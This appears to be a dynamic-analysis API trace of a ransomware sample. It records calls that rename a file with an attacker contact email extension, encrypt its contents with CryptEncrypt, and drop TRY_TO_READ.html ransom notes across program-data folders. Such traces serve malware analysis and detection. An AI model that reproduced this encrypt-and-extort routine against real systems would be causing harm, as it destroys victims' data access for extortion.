	[0100.738] lstrcpyW (in: lpString1=0x5a2048, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn"
	[0100.738] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.738] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.740] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c0
	[0100.740] GetProcessHeap () returned 0x540000
	[0100.740] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a2048 | out: hHeap=0x540000) returned 1
	[0100.740] GetFileSizeEx (in: hFile=0x4c0, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=390) returned 1
	[0100.740] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x186
	[0100.740] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.740] GetProcessHeap () returned 0x540000
	[0100.740] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.740] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.740] WriteFile (in: hFile=0x4c0, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.741] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.741] WriteFile (in: hFile=0x4c0, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.742] ReadFile (in: hFile=0x4c0, lpBuffer=0x56efb8, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x56efb8*, lpNumberOfBytesRead=0x3a1f778*=0x186, lpOverlapped=0x0) returned 1
	[0100.742] SetFilePointer (in: hFile=0x4c0, lDistanceToMove=-390, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.742] WriteFile (in: hFile=0x4c0, lpBuffer=0x5781b0*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5781b0*, lpNumberOfBytesWritten=0x3a1f778*=0x186, lpOverlapped=0x0) returned 1
	[0100.742] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Mozilla\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da7f0
	[0100.742] FindNextFileW (in: hFindFile=0x5da7f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.742] FindNextFileW (in: hFindFile=0x5da7f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 1
	[0100.742] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Mozilla\\logs\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\mozilla\\logs\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c4
	[0100.744] FindNextFileW (in: hFindFile=0x5da7f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca7fee70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.744] FindNextFileW (in: hFindFile=0x5da7f0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca7fee70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.744] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Oracle\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da830
	[0100.745] FindNextFileW (in: hFindFile=0x5da830, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.745] FindNextFileW (in: hFindFile=0x5da830, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca7fee70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.745] FindNextFileW (in: hFindFile=0x5da830, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca7fee70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0100.745] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da870
	[0100.745] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.746] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2924cac0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x29272c20, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x29272c20, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="42D5BEC7DDFBD49E76467529CBC2868987BF8460", cAlternateFileName="42D5BE~1")) returned 1
	[0100.746] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\42D5BEC7DDFBD49E76467529CBC2868987BF8460\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\42d5bec7ddfbd49e76467529cbc2868987bf8460\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.747] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa989d730, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", cAlternateFileName="54050A~1")) returned 1
	[0100.747] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.750] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca7fee70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca7fee70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7fee70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.750] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", cAlternateFileName="{13A4E~1.210")) returned 1
	[0100.750] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.752] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xecd314a0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xecd314a0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", cAlternateFileName="{33D1F~1")) returned 1
	[0100.752] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.754] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", cAlternateFileName="{37B8F~1.610")) returned 1
	[0100.754] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.756] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a127460, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", cAlternateFileName="{3C3AA~1")) returned 1
	[0100.757] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.760] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", cAlternateFileName="{582EA~1.250")) returned 1
	[0100.760] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.762] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", cAlternateFileName="{68306~1.250")) returned 1
	[0100.762] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.764] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", cAlternateFileName="{8D4F7~1.250")) returned 1
	[0100.764] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.767] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", cAlternateFileName="{929FB~1.210")) returned 1
	[0100.767] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.769] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", cAlternateFileName="{A749D~1.210")) returned 1
	[0100.769] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.770] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", cAlternateFileName="{B1755~1.610")) returned 1
	[0100.771] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.773] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd7d760, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", cAlternateFileName="{BD95A~1.610")) returned 1
	[0100.773] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
	[0100.774] FindNextFileW (in: hFindFile=0x5da870, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfaaff840, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", cAlternateFileName="{CA675~1")) returned 1
	[0100.774] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4cc
